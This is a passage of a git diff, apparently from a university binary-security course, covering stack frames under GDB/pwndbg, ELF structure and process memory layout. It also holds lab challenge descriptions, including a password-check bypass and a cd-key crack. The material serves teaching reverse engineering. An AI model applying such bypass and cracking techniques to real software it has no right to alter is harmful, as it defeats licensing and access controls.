:, push ebp + 0x80483b5 :,mov ebp,esp + 0x80483b7 :,sub esp,0x10 +=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 + 0x80483c1 :,mov eax,0x0 + 0x80483c6 :,leave + 0x80483c7 :,ret + 0x80483c8:,nop +[------------------------------------stack-------------------------------------] +0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c +0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) +0012| 0xbffff374 --> 0x0 +0016| 0xbffff378 --> 0x0 +0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) +0024| 0xbffff380 --> 0x1 +0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080483ba in main () +``` + +As you can see the operations that relate to the stack are: + +- The old frame pointer is saved. +- EBP takes the value of ESP (the frame pointer is set to point to the current function's frame). +- `0x10` is subtracted from ESP (reserve space for local variables). +- The value `0x01` is placed at the address of EBP-0x4 (the local variable `a` takes the value 1). + +### Function Parameters + +The stack is also used to pass in parameters to functions. + +In the process of calling a function we can define two entities. +The callee (the function that gets called) and the caller (the function that calls). + +When a function is called, the caller pushes the parameters for the callee on the stack. +The parameters are pushed in reverse order. + +When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of it's frame. + +At this point it makes sense to remember the following cases: + +- When EBP+value is referred to it is generally a referral to a parameter passed in to the current function. 
+- When EBP-value is referred to it is generally a referral to a local variable. + +Lets see how this happens with the following code: + +```c +#include + +int add(int a, int b) +{ + int c; + c=a+b; + return c; +} + +int main() +{ + add(10,3); + return 0; +} +``` + +```text +pwndbg> pdis 0x080483ca +Dump of assembler code for function main: + 0x080483ca <+0>:,push ebp #save the old frame pointer + 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer + 0x080483cd <+3>:,sub esp,0x8 #create space for local variables + 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #push the last parameter of the function that is to be called + 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #push the second to last(the first in this case) parameter of the function that is to be called + 0x080483df <+21>:,call 0x80483b4 #call the function + 0x080483e4 <+26>:,mov eax,0x0 + 0x080483e9 <+31>:,leave + 0x080483ea <+32>:,ret +End of assembler dump. +pwndbg> pdis 0x080483b4 +Dump of assembler code for function add: + 0x080483b4 <+0>:,push ebp #save the old frame pointer + 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer + 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables + 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the first parameter into the EAX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)+last_parameter(4 bytes)) + 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the second parameter into the EDX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)) + 0x080483c0 <+12>:,add eax,edx #add the registers + 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) + 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it + 0x080483c8 <+20>:,leave + 0x080483c9 <+21>:,ret +End of assembler dump. +``` + +As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds. 
+ +If you don't understand why the offset for the parameters starts at EBP+0x08 and not EBP, follow through with the next section. + +### Calling functions (call and ret) + +When calling a function the caller places the return address on the stack. +This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes execution. + +The last instruction in functions is usually a `ret` instruction that resumes execution in the caller. + +For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. + +The call instruction could be translated to the following instructions: + +- `push eip` +- `mov eip, address_of_called_function` + +The ret instruction could be translated into `pop eip`. + +The visual depiction of how the stack looks while a program is executing can be found in section 2 but will be included here as well: + +![Stack Convention](https://security.cs.pub.ro/summer-school/wiki/_media/session/stack-convention.png) + +### Next Section Preview: Buffer Overflows + +Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. + +A buffer overflow takes place when there is a lack of checking regarding boundaries and usually results in complete control of the program's instruction pointer. +This takes place when a buffer overflows its boundaries and overwrites the return address of a function. + +A typical example of buffer overflows can be seen in the following picture: + +![Buffer Overflow](https://security.cs.pub.ro/summer-school/wiki/_media/session/s5_buffer_overflow.jpg) + +## Challenges + +Use GDB and pwndbg to run the code provided in the Activities section. + +### 01. Challenge - Explore The Simple Password Protected Bash + +The executable gets input from the user and evaluates it against a static condition. 
+If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. + +Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. + +Gather as much info about the executable as possible through the techniques you have learned in previous sessions. + +Think of modifying registers for forcing the executable to call the function (there is more than one way of doing this). + +### 02. Challenge - Simple Password Protected Bash Destruction + +What is the condition against which your input is evaluated in the `sppb` executable? + +The ultimate goal is to be able to craft an input for the binary so that the `password_accepted` function is called (modifying registers while running the program in GDB is just for training purposes). + +### 03. Challenge - Domino + +Analyze the binary, reverse engineer what it does and get a nice message +back. + +### 04. Challenge - Call me + +Investigate the binary in `04-challenge-call-me/src/call_me` and find out the flag. + +Hint: There is something hidden you can toy around with. + +Hint: The challenge name is a hint. + +### 05. Challenge - Snooze Me + +I wrote a simple binary that computes the answer to life, the universe and everything. +I swear it works... eventually. + +### 06. Challenge - Phone Home + +To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. + +Unfortunately, the key feature of the application is now unreachable due to a bug. +Can you bypass the impossible condition? + +### 07. Challenge - Chain encoder + +How do you reverse something made to be irreversible, you are welcome to find out in this challenge. + +### 08. Challenge - Simple cdkey + +I found this software but I don't have the cd key, can you crack it for me? 
diff --git a/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md b/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md index 2dc02cb..f40361f 100644 --- a/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md +++ b/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md @@ -10,7 +10,9 @@ There's something more in the executable, isn't there? Vulnerability ------------- -There is a global variable storing an ELF file. The participant will retrieve it, find out what the XOR key is by matching the ELF header, extract the ELF file and run it. The executable is stripped to make things a little bit difficult for the participant. +There is a global variable storing an ELF file. +The participant will retrieve it, find out what the XOR key is by matching the ELF header, extract the ELF file and run it. +The executable is stripped to make things a little bit difficult for the participant. Exploit ------- @@ -20,7 +22,8 @@ Script in `./sol/exploit.py` Environment ----------- -Nothing special. The executable file is to be downloaded by the participant. +Nothing special. +The executable file is to be downloaded by the participant. Deploy ------ diff --git a/chapters/binary-analysis/executables-and-processes/reading/README.md b/chapters/binary-analysis/executables-and-processes/reading/README.md index cf31232..dfea5cc 100644 --- a/chapters/binary-analysis/executables-and-processes/reading/README.md +++ b/chapters/binary-analysis/executables-and-processes/reading/README.md @@ -1,9 +1,3 @@ ---- -linkTitle: Executables and Processes -type: docs -weight: 10 ---- - # Executables and Processes From a user's perspective, the main purpose of the computing system is to run applications. 
@@ -44,7 +38,7 @@ After the process starts, whatever happens is said to happen at / during **runti For this session we will first look at the process virtual address space and see how it is updated at runtime. We will then map that information to the program executable and what's hapenning at load-time. -We will then spend more time dissecting and executable and make the first steps on static analysis, the subject of the [next section](https://github.com/razvand/binary/tree/master/sessions/static-analysis). +We will then spend more time dissecting and executable and make the first steps on static analysis, the subject of the [next section](../../static-analysis/reading/). ## Process Memory Layout @@ -56,7 +50,7 @@ Let's write a simple Hello World application and investigate. **IMPORTANT:** Note that we have removed **Address Space Layout Randomization** for these examples. We'll explain this later. -``` +```c #include int main() { @@ -69,11 +63,13 @@ int main() } ``` -``` +```console $ gcc -Wall hw.c -o hw -m32 + $ ./hw & [1] 4771 Hello world + $ cat /proc/4771/maps 08048000-08049000 r-xp 00000000 08:06 1843771 /tmp/hw 08049000-0804a000 r--p 00000000 08:06 1843771 /tmp/hw @@ -93,20 +89,21 @@ fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] ``` If we start another process in the background the output for it will be exactly the same as this one. -Why is that? The answer, of course, is virtual memory. +Why is that? +The answer, of course, is virtual memory. The kernel provides this mechanism through which each process has an address space **completely isolated** from that of other running processes. They can still communicate using inter-process communication mechanisms provided by the kernel but we won't get into that here. Shortly put, there would be two processes with the same name and with two **apparently** identical mappings, but still the two programs would be isolated from one another. 
An initial schematic of the memory layout would be the following: -![ELF Memory Layout](assets/elf-space.png) +![ELF Memory Layout](../media/elf-space.png) ### Executable As we have seen, there are three memory regions associated with the executable: -``` +```text 08048000-08049000 r-xp 00000000 08:06 1843771 /tmp/hw 08049000-0804a000 r--p 00000000 08:06 1843771 /tmp/hw 0804a000-0804b000 rw-p 00001000 08:06 1843771 /tmp/hw @@ -114,15 +111,15 @@ As we have seen, there are three memory regions associated with the executable: From their permissions we can infer what they correspond to: -* `08048000-08049000 r-xp` is the `.text` section along with the rest of the executable parts -* `08049000-0804a000 r–p` is the `.rodata` section -* `0804a000-0804b000 rw-p` consists of the `.data`, `.bss` sections and other R/W sections +- `08048000-08049000 r-xp` is the `.text` section along with the rest of the executable parts +- `08049000-0804a000 r–p` is the `.rodata` section +- `0804a000-0804b000 rw-p` consists of the `.data`, `.bss` sections and other R/W sections It is interesting to note that the executable is almost identically mapped into memory. The only region that is *compressed* in the binary is the `.bss` section. Let's see this in action by dumping the header of the file: -``` +```console $ hexdump -Cv hw | head 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 b0 83 04 08 34 00 00 00 |............4...| @@ -134,8 +131,9 @@ $ hexdump -Cv hw | head 00000070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 |................| 00000080 00 80 04 08 6c 06 00 00 6c 06 00 00 05 00 00 00 |....l...l.......| 00000090 00 10 00 00 01 00 00 00 00 0f 00 00 00 9f 04 08 |................| + $ gdb ./hw -........... + gdb-peda$ hexdump 0x08048000 /10 0x08048000 : 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............ 0x08048010 : 02 00 03 00 01 00 00 00 b0 83 04 08 34 00 00 00 ............4... 
@@ -159,7 +157,7 @@ The process is called **binning**. Let's see how the brk evolves in our executable using strace: -``` +```console $ strace -i -e brk ./hw [ Process PID=1995 runs in 32 bit mode. ] [f7ff2314] brk(0) = 0x804b000 @@ -170,7 +168,7 @@ Hello world Let's test the fact that the `brk` does not decrease and that future malloc's can reuse previously freed regions: -``` +```c #include int main() { @@ -190,13 +188,14 @@ int main() } ``` -``` +```console $ strace -e brk ./hw [ Process PID=2424 runs in 32 bit mode. ] brk(0) = 0x804b000 brk(0) = 0x804b000 brk(0x806c000) = 0x806c000 +++ exited with 0 +++ + $ ltrace -e malloc ./hw hw->malloc(0) = 0x804b008 hw->malloc(100) = 0x804b018 @@ -241,7 +240,7 @@ Furthermore, after the regions are freed they are reused. In our example we had the following memory mappings: -``` +```text f7ded000-f7dee000 rw-p 00000000 00:00 0 f7dee000-f7f93000 r-xp 00000000 08:06 917808 /lib32/libc-2.17.so f7f93000-f7f95000 r--p 001a5000 08:06 917808 /lib32/libc-2.17.so @@ -259,7 +258,7 @@ As these are also ELF files you can see that they have similar patterns: multipl One more thing to note here is that large calls to `malloc` result in calls to `mmap2`: -``` +```c #include int main() { @@ -270,7 +269,7 @@ int main() } ``` -``` +```console # strace -e brk,mmap2 ./hw_large [ Process PID=3445 runs in 32 bit mode. ] brk(0) = 0x804b000 @@ -300,9 +299,10 @@ Since the heap and the mmap region do not have this limit imposed the optimizati Let's put this into perspective. You can view the current stack limit using `ulimit -s`. -``` +```console $ ulimit -s 8192 + $ python >>> hex(0xffffffff - 8192*1024) '0xff7fffff' @@ -314,8 +314,9 @@ This is probably an optimization. However, we can set the stack size to unlimited and the mmap allocation direction will reverse: -``` +```console $ ulimit -s unlimited + $ strace -e mmap2,brk ./hw_large [ Process PID=4617 runs in 32 bit mode. 
] brk(0) = 0x804b000 @@ -335,7 +336,6 @@ Big allocation 0x55766008 ^Z [1]+ Stopped strace -e mmap2,brk ./hw_large - $ cat /proc/4617/maps 08048000-08049000 r-xp 00000000 08:06 1843771 /tmp/hw_large 08049000-0804a000 r--p 00000000 08:06 1843771 /tmp/hw_large @@ -358,7 +358,7 @@ As you can see, the big allocation is now towards the stack instead of towards t Returning to the main functionality of the stack, remember from the previous lab that local variables are declared on the stack. This translates into assembly code in the following way: -``` +```c int main() { @@ -370,7 +370,7 @@ int main() The C snippet would be translated into ASM something like: -``` +```text 0804840c
: 804840c: 55 push ebp 804840d: 89 e5 mov ebp,esp @@ -391,12 +391,12 @@ Apart from the mappings that appear in `/proc//maps` with `r--`, `rw-`, etc Thus, a read access at such a location will violate the permission of that region so the whole app will be killed by the signal received (unless it has a signal handler). Examples: -* Dereferencing a `NULL` pointer will try to read from `0x00000000` which is not (usually) mapped => `SIGSEGV` (read access on none) -* Writing after the end of a heap buffer (if the heap buffer is exactly at the end of a mapping) will determine writes into unmapped pages => SIGSEGV (write access on none) -* Trying to write to `.rodata` => SIGSEGV (write access on read only) -* Overwriting the stack with "AAAAAAAAAAAAAAAAAAA" will also overwrite the return address and make the execution go to `0x41414141` => SIGSEGV (execute access on none) -* Overwriting the stack and return address with another address to a shellcode on the stack => SIGSEGV (execute access on read/write only) -* Trying to rewrite the binary (`int *v = main; *v = 0x90909090;`) => SIGSEGV (write access on read/execute only) +- Dereferencing a `NULL` pointer will try to read from `0x00000000` which is not (usually) mapped => `SIGSEGV` (read access on none) +- Writing after the end of a heap buffer (if the heap buffer is exactly at the end of a mapping) will determine writes into unmapped pages => `SIGSEGV` (write access on none) +- Trying to write to `.rodata` => `SIGSEGV` (write access on read only) +- Overwriting the stack with "AAAAAAAAAAAAAAAAAAA" will also overwrite the return address and make the execution go to `0x41414141` => `SIGSEGV` (execute access on none) +- Overwriting the stack and return address with another address to a shellcode on the stack => `SIGSEGV` (execute access on read/write only) +- Trying to rewrite the binary (`int *v = main; *v = 0x90909090;`) => `SIGSEGV` (write access on read/execute only) ## Tutorials @@ -412,14 +412,14 @@ UNIX System V 
Release 4, which Sun co-developed, introduced the ELF object forma Later it was developed and published as part of the ABI (Application Binary Interface) as an improvement over COFF, the previous object format and by the late 1990s it had become the standard for UNIX and UNIX-like systems including Linux and BSD derivatives. Depending on processor architectures, several specifications have emerged with minor changes, but for this session we will be focusing on the [ELF-32](http://www.skyfree.org/linux/references/ELF_Format.pdf) format. -![Linking View and Execution View](assets/elf-link-exec.png) +![Linking View and Execution View](../media/elf-link-exec.png) The structure of an ELF file during the linking process is the same with that of an object file. The linking process involves collecting and combining code and data into a single file that will later be loaded into memory and executed. On the right hand side we can see how the the ELF file structure will be transformed in memory. **Sections** instruct the Linker while **Segments** instruct the Operating System. -![ELF Merging](assets/elf-merging.png) +![ELF Merging](../media/elf-merging.png) As we can see, the information inside the two program headers and the section headers gets merged as needed inside the more familiar program segments. The basic role of the ELF file format is to serve as a roadmap for the linker and the OS Loader to generate a running process. @@ -434,7 +434,7 @@ This way of doing things, still in use today, involves loading all of the code a This basically meant that, the required resources to run a program were determined by the number of instances, with no possibility of optimization. Running 10 instances of the same program meant that there was a lot of code duplication going on in the memory space. -![ELF Static Linking](assets/elf-static-linking.png) +![ELF Static Linking](../media/elf-static-linking.png) Along with the ELF format came a new way of doing things. 
Instead of linking all the source files that contained subroutines into the final binaries, separate binaries were organized in libraries that could be loaded per use case, on demand. @@ -443,21 +443,21 @@ The new process allowed for a much more efficient resource utilization and was n Running 10 instances of the same program now meant that only the volatile parts of those binaries would be duplicated. In cases where the same code can be reused, it is allocated only once and used by multiple instances of the same program. -![ELF Dynamic Linking](assets/elf-dynamic-linking.png) +![ELF Dynamic Linking](../media/elf-dynamic-linking.png) ### ELF Types There are several ELF types but the most common types we will be dealing with are: -* Relocatable Files -* Shared Objects -* Executable Files +- Relocatable Files +- Shared Objects +- Executable Files #### ELF Type - Relocatable Files Relocatable files are obtained using the core compiler and basically contain all the ELF information necessary except for data like external variables or subroutines that are present in other files. -``` +```console gcc -c -o reloc.o source.c gcc -c -fPIC -o reloc.o source.c ``` @@ -471,11 +471,11 @@ Shared libraries are loaded up at runtime as needed by an OS component named the Shared objects may include other shared objects and this aspect is very important because, when loading specific subroutines, the ELF file must provide its dependencies. As such, the process of dynamic linking does a breadth first search gradually building the full dependency list. -![Shared Objects](assets/elf-dependency.png) +![Shared Objects](../media/elf-dependency.png) You can view the list of shared object dependencies for any given binary as well as the addresses where they will be loaded in memory by using the `ldd` command. 
-``` +```console ldd /bin/ls linux-gate.so.1 => (0x00e02000) librt.so.1 => /lib/tls/i686/cmov/librt.so.1 (0x004f9000) @@ -491,14 +491,14 @@ ldd /bin/ls All libraries should adhere to a strict naming convention. Shared objects have two names: -* **soname** - that consists of the prefix `lib`, followed by the library name, then a `.so`, another dot, then the major version (e.g. `libtest.so.1`) -* **real name** - is actually a file name, that usually extends the **soname** by adding a dot and minor version number along with the release version (e.g. `libtest.so.1.23.3`) +- **soname** - that consists of the prefix `lib`, followed by the library name, then a `.so`, another dot, then the major version (e.g. `libtest.so.1`) +- **real name** - is actually a file name, that usually extends the **soname** by adding a dot and minor version number along with the release version (e.g. `libtest.so.1.23.3`) Additionally, each library source file should have an accompanying header file with the extension `.h` and the same name. Adhering to these naming conventions is quite important as dependencies are resolved based on the **soname**. -``` +```console gcc -c -fPIC libtesting.c ld -shared -soname libtesting.so.1 -o libtesting.so.1.0 -lc libtesting.o ldconfig -v -n . @@ -520,7 +520,6 @@ A good tutorial on how to create a basic shared object can be found [here](https They are regarded as the end result and contain all the information necessary to create a running process. - ### ELF Structure The following wiki sections on ELF structure are dense and are **not** meant to be known by heart. 
@@ -528,10 +527,10 @@ The following wiki sections on ELF structure are dense and are **not** meant to Tools of the trade are: -* readelf -* objdump -* ldd -* Ghidra/IDA (Ghidra is Open Source, while IDA is not and it is really expensive) +- readelf +- objdump +- ldd +- Ghidra/IDA (Ghidra is Open Source, while IDA is not and it is really expensive) The command outputs that follow are rather large so we will only be discussing the less obvious parts. We will also leave out information that's not really that important or generally weird. @@ -540,7 +539,7 @@ We will also leave out information that's not really that important or generally Using `readelf` is straight-forward enough: -``` +```console readelf -h program ELF Header: @@ -567,19 +566,19 @@ ELF Header: Below we will discuss the less evident aspects of the above output -* **Elf Identification** (16 bytes) +- **Elf Identification** (16 bytes) * **Magic** - the first bytes of the binary that identify the file as ELF * **Class** - identifies the type of ELF (ex: ELF-32, ELF-64) * **Data** - specifies the type of data encoding * **Version** - version of the ELF header * **OS/ABI** - version of the OS * **ABI** - version of the ABI specification -* **Type** - Relocatable, Executable, Shared Object -* **Machine** - Required Machine architecture to run the executable -* **Entry Point Address** - the memory address where the OS loader transfers control to the process code for the first time. 
-* **Start of Program Headers** - File offset where the array of program headers start -* **Start of Section Headers** - File offset where the array of section headers starts -* **Section Header String Table Index** - the index in the section table name where the information about the section name string table can be found +- **Type** - Relocatable, Executable, Shared Object +- **Machine** - Required Machine architecture to run the executable +- **Entry Point Address** - the memory address where the OS loader transfers control to the process code for the first time. +- **Start of Program Headers** - File offset where the array of program headers start +- **Start of Section Headers** - File offset where the array of section headers starts +- **Section Header String Table Index** - the index in the section table name where the information about the section name string table can be found #### Program Headers @@ -587,8 +586,8 @@ Below we will discuss the less evident aspects of the above output Again, `readelf` is used with minimum syntax: -``` -readelf -l program +```console +$ readelf -l program Elf file type is EXEC (Executable file) Entry point 0x8048330 @@ -621,17 +620,17 @@ Program Headers: The **Program Header** table features an array of structures that shows how parts of the file will be mapped into memory at runtime. The last parts of the output show what sections will be merged into various program headers before loading the ELF into memory and becoming segments. -* **Type** +- **Type** * **PHDR** - information about the program header table itself * **INTERP** - information about the null terminated string that specifies the path to the dynamic loader. 
This header is only present in executable that use shared object code * **LOAD** - use to specify a general purpose loadable segment * **DYNAMIC** - information necessary to the dynamic linking process -* **Offset** - offset from the beginning of the file where the segment begins -* **VirtAddr** - the address where the segment will start in memory -* **FileSz** - number of bytes occupied by the segment on disk -* **MemSiz** - number of bytes occupied by the segment in memory -* **Align** - specifies a boundary to which the segments are aligned on file and in memory +- **Offset** - offset from the beginning of the file where the segment begins +- **VirtAddr** - the address where the segment will start in memory +- **FileSz** - number of bytes occupied by the segment on disk +- **MemSiz** - number of bytes occupied by the segment in memory +- **Align** - specifies a boundary to which the segments are aligned on file and in memory Here are two resources to read about [GNU_RELRO](https://www.airs.com/blog/archives/189) and [GNU_STACK](https://guru.multimedia.cx/pt_gnu_stack/) **Program Headers**. @@ -639,7 +638,7 @@ Here are two resources to read about [GNU_RELRO](https://www.airs.com/blog/archi Section headers are the central piece of reference used to organize the ELF files both on disk and in memory. 
-``` +```console readelf -S program There are 30 section headers, starting at offset 0x1128: @@ -677,8 +676,8 @@ Section Headers: [29] .strtab STRTAB 00000000 0019e8 0001fd 00 0 0 1 ``` -* **Name** - is obtained by reading the value of the section names table at the specified index -* **Type** +- **Name** - is obtained by reading the value of the section names table at the specified index +- **Type** * **PROGBITS** - information that is given meaning by the program when loaded into memory * **NOBITS** - similar to PROGBITS in meaning but occupies no space in the file * **STRTAB** - contains the program string table @@ -686,31 +685,31 @@ Section Headers: * **DYNAMIC** - holds information necessary for dynamic linking * **DYNSYM** - holds a set of symbols used in the dynamic linking process * **REL** - holds relocation entries -* **Addr** - if the section is part of an executable it will hold the virtual address where the section could be found in memory. +- **Addr** - if the section is part of an executable it will hold the virtual address where the section could be found in memory. If not it would be 0. 
-* **Off** - offset from the beginning of the file to where the section starts -* **Size** - size of the section in bytes -* **ES** - size in bytes per entry, if fixed entry size is used -* **FLG** -* **X** - contains executable code -* **W** - contains writable code -* **A** - will be loaded into memory as-is during process execution -* **Al** - section alignment constraints +- **Off** - offset from the beginning of the file to where the section starts +- **Size** - size of the section in bytes +- **ES** - size in bytes per entry, if fixed entry size is used +- **FLG** +- **X** - contains executable code +- **W** - contains writable code +- **A** - will be loaded into memory as-is during process execution +- **Al** - section alignment constraints The **Inf** and **Lnk** columns have specific interpretations depending on the section type, as can be seen in the following image: -![ELF Sections Inf and Lnk](assets/elf-sect-inf.png) +![ELF Sections Inf and Lnk](../media/elf-sect-inf.png) Additionally, the raw contents of each section can be dumped using both `objdump` and `readelf`. -``` +```console readelf -x .got program Hex dump of section '.got': 0x08049ff0 00000000 .... ``` -``` +```console objdump -s -j ".got" program program: file format elf32-i386 @@ -730,7 +729,7 @@ Given the machine code of a binary, various elements inside it will use absolute The entire idea of shared libraries is that these can be loaded and unloaded on demand inside the memory space of whichever process needs them at whichever address is available. As such, a map of how to locate and relocate absolute data points inside the machine code is needed and that's where the symbol table comes in. 
-``` +```console readelf -s libtesting.so.1 Symbol table '.dynsym' contains 8 entries: @@ -777,22 +776,22 @@ Symbol table '.symtab' contains 27 entries: Some information on the symbols that may belong to external files or may be referenced by external files during dynamic linking are copied in the `.dynsym` section. -* Name - symbol name -* Type +- Name - symbol name +- Type * NoType - not specified * FUNC - the symbol influences a function * SECTION - associated with a section * FILE - a symbol that references a files -* Bind +- Bind * LOCAL - the symbol information is not visible outside the object file * GLOBAL - the symbol is visible to all the files being combined to form the executable -* Size - the size of the symbol in bytes or 0 if it is unknown -* Ndx +- Size - the size of the symbol in bytes or 0 if it is unknown +- Ndx * UND - unspecified section reference * COM - unallocated C external variable * ABS - an absolute value for the reference * value - an index into the section table -* Value - if the symbol table is part of an executable, the value will contain a memory address where the symbol resides. +- Value - if the symbol table is part of an executable, the value will contain a memory address where the symbol resides. Otherwise it will contain an offset from the beginning of the section referenced by Ndx or O. As you can see, the symbol table as it appears in object files compiled with gcc is quite verbose, revealing function names and visibility as well as variable scopes, names and even sizes. @@ -800,17 +799,17 @@ In its default form it even shows the name of the sourcefile. 
In order to subvert Reverse Engineering attempts you can check out some of the methods of stripping the symbol table of valuable information: -* [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) -* [strip](https://sourceware.org/binutils/docs/binutils/strip.html) +- [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) +- [strip](https://sourceware.org/binutils/docs/binutils/strip.html) #### Relocations Relocations were a concept that was present ever since the invention of static linking. The initial purpose of relocations was to give the static linker a roadmap when combining multiple object files into a binary by stating: -* The **Symbol** that needs to be fixed. -* **Where** you can find the symbol (file/section offset). -* An **Algorithm** for making the fixes. +- The **Symbol** that needs to be fixed. +- **Where** you can find the symbol (file/section offset). +- An **Algorithm** for making the fixes. The fixes would usually be made in the `.data` and `.text` sections and everything was well. Dynamic runtime brought a bit of a complication to modifications that needed to be made in the code segments. 
@@ -826,10 +825,10 @@ The initial call is made to a stub sequence in the **PLT** which bounces off a * Relocations and how they get applied are very complex topic and we will only try to cover as far is helps detecting file and symbol types If you want to read more you can refer to some of these resources: -* [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) -* [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) +- [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) +- [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) -``` +```console readelf -r libdynamic.o Relocation section '.rel.text' at offset 0x5f8 contains 8 entries: @@ -854,9 +853,8 @@ Relocation section '.rel.data.rel' at offset 0x648 contains 2 entries: 00000004 00000e01 R_386_32 00000000 so_fpublic_global ``` - -* **Offset** - In relocatable files and linked shared objects it contains the offset from the beginning of the section , where the relocation needs to be applied -* **Info** - This field is used to derive the index in the symbol table to the affected symbol as well as the algorithm needed for fixing. +- **Offset** - In relocatable files and linked shared objects it contains the offset from the beginning of the section , where the relocation needs to be applied +- **Info** - This field is used to derive the index in the symbol table to the affected symbol as well as the algorithm needed for fixing. * `info >> 8` - symbol table index * `info & 0xff` - algorithm type as defined in the documentation @@ -864,20 +862,20 @@ Relocation section '.rel.data.rel' at offset 0x648 contains 2 entries: By looking at the types of relocations we can draw some basic conclusions about the symbol types and also about the files. 
-* Relocatable Files +- Relocatable Files * **R_386_32** - usually used to reference changes to a local symbol * **R_386_PC32** - reference a relative distance from here to the symbol -* Relocatable Files for Shared object +- Relocatable Files for Shared object * **R_386_GOTOFF** - usually found in the code area, describes the offset from the beginning of GOT to a local symbol * **R_386_GOT32** - also speicific to the code area. These entries persist in the linkage phase * **R_386_PLT32** - used when describing calls to global subroutines. when the linker will read this information it will generate an entry in the GOT and PLT tables * **R_386_GOTPC** - used in function to calculate the start address of the GOT -* Executables that use Dynamic Linking +- Executables that use Dynamic Linking * **R_386_JMP** - the dynamic linker will deposit the address of the external subroutine during execution * **R_386_COPY** - the address of global variable from shared object will be deposited here -* Shared Object Files +- Shared Object Files * **R_386_JMP** - the dynamic linker will deposit the address of the external subroutine from one of the shared object dependencies during execution * **R_386_GLOB_DATA** - used to deposit the address of a global symbol defined in one of the shared object dependencies * **R_386_RELATIVE** - at link time all the R_386_GOTOFF entries are fixed and these relocation will contain absolute addresses @@ -899,12 +897,12 @@ All conventions regarding shared object names have been respected. Hints: -* Use `nm` to investigate the files, determine what pieces you need to put together and then link them with `gcc`. -* Check whether the files are compiled for 32 bits or for 64 bits and use the proper `gcc` command. +- Use `nm` to investigate the files, determine what pieces you need to put together and then link them with `gcc`. +- Check whether the files are compiled for 32 bits or for 64 bits and use the proper `gcc` command. 
If you do it correctly you will get an executable that you can run and get the following output: -``` +```text Congratulations extern var1 10 at 0x565fe020 extern var2 at 0x565fe030 @@ -923,16 +921,16 @@ You cannot modify any of the binaries in order to solve this task. Hints: -* Run the file, check what it is missing and build the missing component. +- Run the file, check what it is missing and build the missing component. Use `nm` to determine what symbols should be part of the missing component. -* Use `LD_LIBRARY_PATH=.` to run an executable file and load a shared library file from the current folder. +- Use `LD_LIBRARY_PATH=.` to run an executable file and load a shared library file from the current folder. ### 03. Memory Dump Analysis Using your newfound voodoo skills you are now able to tackle the following task. In the middle of two programs I added the following lines: -``` +```c { int i; int *a[1]; @@ -943,7 +941,7 @@ In the middle of two programs I added the following lines: The results were the following, respectively: -``` +```text 0x804853b 0x1 0x8048530 @@ -968,7 +966,7 @@ The results were the following, respectively: And: -``` +```text 0xbfffe7d0 0xd696910 0x80484a9 @@ -993,11 +991,11 @@ And: Try to tell: -* Which was running on a pure 32 bit system -* Which values from the stack traces are from the `.text` region -* Which do not point to valid memory addresses -* Which point to the stack -* Which point to the library/mmap zone +- Which was running on a pure 32 bit system? +- Which values from the stack traces are from the `.text` region? +- Which do not point to valid memory addresses? +- Which point to the stack? +- Which point to the library/mmap zone? ### 04. Compiler Flags @@ -1015,7 +1013,9 @@ There should be a flag message printed in case you solve it correctly. You will need to modify the executable. We recommend you install and use [Bless](https://packages.ubuntu.com/bionic/bless). -What actions does the program do? 
